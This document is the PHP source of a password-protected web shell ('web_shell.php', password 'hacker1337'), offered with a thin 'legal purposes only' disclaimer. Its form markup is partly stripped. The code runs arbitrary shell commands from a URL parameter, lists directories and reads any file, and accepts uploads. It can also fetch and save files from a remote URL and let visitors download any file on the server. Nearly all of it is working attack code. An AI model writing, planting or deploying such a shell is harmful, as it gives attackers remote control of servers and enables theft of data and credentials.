This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool. Respectfully, S0KRAT3z.session_start();// Check if the form is submittedif ($_SERVER['REQUEST_METHOD'] === 'POST') { // Define the expected password $expectedPassword = 'hacker1337'; // Replace 'hacker1337' with your desired password // Get the entered password from the form $enteredPassword = $_POST['password']; // Check if the entered password matches the expected password if ($enteredPassword === $expectedPassword) { // Password is correct, set the session variable $_SESSION['authenticated'] = true; } else { // Password is incorrect, display an error message echo 'Invalid password. Access denied.'; }}// Check if the user is not logged in, display the login formif (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {

Access Requested?

<label for="password">Password:</label> <button type="submit">Submit</button>
// Stop executing the rest of the script exit();}// Logout functionalityif (isset($_POST['logout']) && $_POST['logout'] === 'true') { // Destroy the session and redirect to the login form session_destroy(); header('Location: web_shell.php'); exit();}Remote Code Execution <br />
Command: <button type="submit">Go</button>
if (isset($_GET['command'])) { $command = $_GET['command']; echo '<pre>'; echo 'Command: ' . $command . "\n"; echo 'Output:' . "\n"; echo shell_exec($command); echo '</pre>';}<hr />Retrieve File/Scan Directory <br />Current file path: echo __FILE__; <br />
Path: <button type="submit">Go</button>
<pre>if (isset($_GET['path'])) { if ($_GET['path'] == '') { $path = './'; } else { $path = $_GET['path']; } echo 'Realpath: ' . realpath($_GET['path']) . '<br />'; echo 'Type: '; if (is_dir($path)) { echo 'Directory <br />'; foreach (scandir($path) as $data) { echo $data . "<br />"; } } else { echo 'File <br />'; print_r(file_get_contents($path)); }}</pre><hr />Upload File From Your Local Machine <br />
File(s): <button type="submit">Upload</button>
if (isset($_FILES['uploads']) && count($_FILES['uploads']) > 0) { $total = count($_FILES['uploads']['name']); for ($i = 0; $i < $total; $i++) { $tmpPath = $_FILES['uploads']['tmp_name'][$i]; if ($tmpPath != '') { $newPath = './' . $_FILES['uploads']['name'][$i]; if (move_uploaded_file($tmpPath, $newPath)) { echo 'Successfully uploaded ' . $_FILES['uploads']['name'][$i] . '<br />'; } else { echo 'Unable to upload ' . $_FILES['uploads']['name'][$i] . '<br />'; } } }}<hr />Upload File From URL <br />
Filename to save: <br /> URL: <button type="submit">Upload</button>
<pre>if (isset($_POST['save_name']) && isset($_POST['url'])) { if (file_put_contents($_POST['save_name'], file_get_contents($_POST['url']))) { echo 'Successfully uploaded ' . $_POST['save_name']; } else { echo 'Unable to upload ' . $_POST['save_name']; }}</pre><hr />Download File From Web Server <br />
Filename to download: <br /> <button type="submit">Download</button>
if (isset($_GET['download'])) { $filename = $_GET['download']; if (file_exists($filename)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filename) . '"'); header('Content-Length: ' . filesize($filename)); ob_clean(); flush(); readfile($filename); exit; } else { echo 'File does not exist.'; }}<hr />Logout <br />
<button type="submit">Logout</button>
<pre>if (isset($_POST['logout']) && $_POST['logout'] === 'true') { // Destroy the session and redirect to the login page session_destroy(); header('Location: web_shell.php'); exit();}</pre>